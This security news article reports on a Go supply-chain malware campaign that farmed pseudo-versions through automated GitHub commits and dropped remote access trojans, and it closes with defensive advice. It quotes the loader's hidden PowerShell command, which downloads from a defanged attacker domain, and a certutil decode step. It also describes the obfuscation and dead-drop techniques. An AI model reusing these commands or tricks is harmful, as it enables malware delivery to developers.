How Fake Commit Activity Masked a Massive Go Malware Campaign
A sophisticated campaign weaponized Go pseudo-versions and automated commits to distribute Windows remote access trojans.
We often use Git commit history as a proxy for trust. If a repository shows a steady stream of contributions, a recent release, and a clean README, we assume it is a living, breathing open-source project. Operation Muck and Load, a sophisticated malware campaign uncovered by security researchers, systematically weaponized this exact developer instinct.
By orchestrating a network of 222 GitHub repositories across 190 accounts, the threat actors did not just host malware; they manufactured the illusion of active software development. At the center of this operation was a malicious Go module posing as a DNS and subdomain scanner. It accumulated over 1,200 versions in less than six months, with more than 700 of them carrying a multi-stage Windows loader.
This campaign highlights a critical shift in supply-chain threats. Attackers are moving beyond simple typosquatting. They are now building automated, distributed lure networks designed to bypass static analysis and exploit the social proof developers rely on when choosing dependencies.
Gaming the Go Proxy with Pseudo-Versions
The entry point for the campaign was github.com/kaleidora/dnsub-scanning-tool, which impersonated the legitimate open-source dnsub project. To the casual observer, the repository looked highly active. This was not the result of rapid feature development, but a deliberate exploitation of how Go handles dependency versioning.
When a developer imports a Go module that lacks an explicit semantic version tag (like v1.0.0), the Go toolchain generates a pseudo-version. This pseudo-version is derived from the commit timestamp and the Git commit hash.
The threat actor exploited this behavior by embedding a malicious GitHub Actions workflow inside their repositories. The workflow was scheduled to run every single minute. Its sole task was to make a minor change to a log file, commit it, and force-push the update back to the repository.
Because each commit generated a new timestamp and hash, it effectively registered a new pseudo-version with the Go module proxy. This allowed the attacker to publish over 700 malicious versions since January 24, 2026.
The workflow also employed an identity-spoofing trick. It configured the Git commit email to a single, static address: ischhfd83@rambler.ru. However, it dynamically set the visible commit username to match the current repository owner. To anyone glancing at the GitHub contribution graph, it appeared that dozens of independent developers were actively maintaining their respective projects. In reality, a single automated pipeline was farming commits across hundreds of disposable accounts.
The Staged Execution Chain
The malicious Go module did not contain the final payload. Instead, it acted as a stealthy first-stage loader. To evade basic static analysis, the threat actor hid the initial execution logic inside the main.go file using excessive horizontal whitespace, pushing the malicious code far to the right of the screen where a developer reviewing the file in a standard editor might miss it.
When executed, main() immediately launches a hidden PowerShell process before any of the actual DNS scanning logic can run. The execution sequence follows a highly structured path:
powershell.exe -WindowStyle Hidden -Command Invoke-WebRequest from hxxps://muckcoding.com/LG-LW/Api-Certificate save output to C:\Users\Public\Pictures\api.db
The downloaded api.db file is not a database. It is an encoded payload. The loader uses the native Windows utility certutil to decode it:
certutil -decode C:\Users\Public\Pictures\api.db C:\Users\Public\Pictures\L.ps1
The resulting L.ps1 script is executed with -ExecutionPolicy Bypass. This script is a multi-layer PowerShell loader that uses Base64 encoding and XOR decryption. Interestingly, one of the intermediate layers contains a Turkish comment: Direkt calistir, baska adim gerekmez (which translates to "Run directly, no other step is needed").
To avoid hardcoding a static payload URL that could be easily blocked, the script acts as a dead-drop resolver. It queries public platforms, including Pastebin, Rlim, YouTube, Instagram, Telegram, and Google Docs, searching for a specific marker string: LastW.
Once it locates the marker, it extracts the encrypted blob immediately following it, decrypts it using a hardcoded key, and resolves the actual download URL. This URL points to a password-protected 7-Zip archive named Quixo.7z hosted on GitHub.
The loader stages a legitimate 7zrr.exe binary under C:\ProgramData\zipathh\ to extract the archive into C:\ProgramData\Windows.Microsoft.Photos. The main executable, Microsoft.exe, is then launched. While the executable is signed by Exodus Movement, Inc., it is used as a host to run the final payloads, which included AsyncRAT, Quasar RAT, Vidar infostealer, and XMRig cryptominers.
The Developer Defense Model
For developers, Operation Muck and Load is a stark reminder that the tools we use to automate our workflows can be turned against us. Defending against this style of attack requires moving beyond basic dependency scanning.
First, we must treat high version counts on young repositories as an immediate red flag. A utility library that has accumulated over a thousand versions in a few months without clear release notes is almost certainly farming pseudo-versions.
Second, do not rely solely on the Go module proxy to protect you. While the Go security team promptly blocked the malicious module once notified, there is always a window of exposure. You can enforce stricter verification by utilizing the Go checksum database (sum.golang.org) and ensuring your go.sum files are committed and verified in your CI/CD pipelines.
Third, audit your Git configurations. The split-identity trick used by the attacker (matching the visible username to the repo owner while keeping a hidden email) is easily caught if you enforce signed commits. If your organization relies on open-source dependencies, consider using tooling that flags unsigned commits or commits originating from unverified emails in upstream repositories.
Finally, configure your endpoint detection and response (EDR) systems to flag suspicious child processes. A Go binary spawning a hidden PowerShell instance that calls certutil to decode a file in a public directory is a textbook indicator of compromise. These behaviors should be blocked at the OS level, regardless of how the binary made its way onto the system.
The Cost of Automation
The Go ecosystem is built on the principle of decentralized package management, pulling directly from version control systems like GitHub. This model offers incredible flexibility, but it also shifts the burden of trust entirely onto the developer.
As threat actors continue to automate the creation of realistic developer personas and active repositories, we can no longer afford to trust a project based on its commit graph or its apparent popularity. The green squares on GitHub are no longer a sign of life; they are simply data points that can be spoofed.
Sources & further reading
- Fake Go DNS scanner spread malware through over 200 GitHub repos — 'Operation Muck and Load' has published 700 malicious modules since January — tomshardware.com
- Malicious Go Module Exposes GitHub Malware Lure Network Span... — socket.dev
- 222 GitHub Repositories Linked to Fake Go Package Malware Operation — securityaffairs.com
- Network of 200 GitHub Repositories Used for Malware Infection - SecurityWeek — securityweek.com
Emeka has spent over a decade tracking threat actors, vulnerability disclosures, and the evolving landscape of application security, bringing a sharp continent-spanning perspective to his reporting. He's known for translating dense CVE advisories into clear, actionable context that developers and security teams alike actually read.
Discussion 0
No comments yet
Be the first to weigh in.